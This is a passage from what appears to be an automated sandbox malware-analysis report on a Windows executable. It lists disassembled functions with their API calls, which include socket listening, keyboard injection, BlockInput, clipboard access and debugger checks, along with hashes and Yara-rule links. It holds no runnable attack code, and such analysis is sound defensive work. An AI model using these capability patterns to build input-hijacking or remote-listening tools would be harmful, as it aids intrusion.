                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                      • String ID:
                                      • API String ID: 1737998785-0
                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                      Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                      Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                      Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                      • FindClose.KERNEL32(?), ref: 004525FF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                      • String ID: *.*$\VH
                                      • API String ID: 2786137511-2657498754
                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                      Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID: pqI
                                      • API String ID: 2579439406-2459173057
                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                      Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsicoll.LIBCMT ref: 00433349
                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                      • __wcsicoll.LIBCMT ref: 00433375
                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: __wcsicollmouse_event
                                      • String ID: DOWN
                                      • API String ID: 1033544147-711622031
                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                      Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: KeyboardMessagePostState$InputSend
                                      • String ID:
                                      • API String ID: 3031425849-0
                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                      Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorLastinet_addrsocket
                                      • String ID:
                                      • API String ID: 4170576061-0
                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                      Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • IsWindowVisible.USER32 ref: 0047A368
                                      • IsWindowEnabled.USER32 ref: 0047A378
                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                      • IsIconic.USER32 ref: 0047A393
                                      • IsZoomed.USER32 ref: 0047A3A1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                      • Opcode Fuzzy Hash: e73d6ad61345a6a69264b283110bd362a2875110283f9bbef61147e752cec385
                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                      Function 0047839D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 228comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 00478442
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                      • CoUninitialize.OLE32 ref: 0047863C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: ce5596abf2290682f5d0e27f8d223ad7ebd511704512ca1ec9ee83ad8894652b
                                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                      • Opcode Fuzzy Hash: ce5596abf2290682f5d0e27f8d223ad7ebd511704512ca1ec9ee83ad8894652b
                                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                      Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: U$\
                                      • API String ID: 4104443479-100911408
                                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                      Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                      • Opcode Fuzzy Hash: eae3f5a3b7237ff41c3bf9ab8d31e2e7de6a625c8a14a51f6d4c2f6ae7e73f22
                                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                      Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                      • String ID:
                                      • API String ID: 901099227-0
                                      • Opcode ID: 7d83386364fee86b1bb5a775f15a6a1b92d0351d5f8e9f745437605a42ea8d7c
                                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                      • Opcode Fuzzy Hash: 7d83386364fee86b1bb5a775f15a6a1b92d0351d5f8e9f745437605a42ea8d7c
                                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                      Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 0045A38B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                      Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                      Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(?), ref: 0045953B
                                      • DeleteObject.GDI32(?), ref: 00459551
                                      • DestroyWindow.USER32(?), ref: 00459563
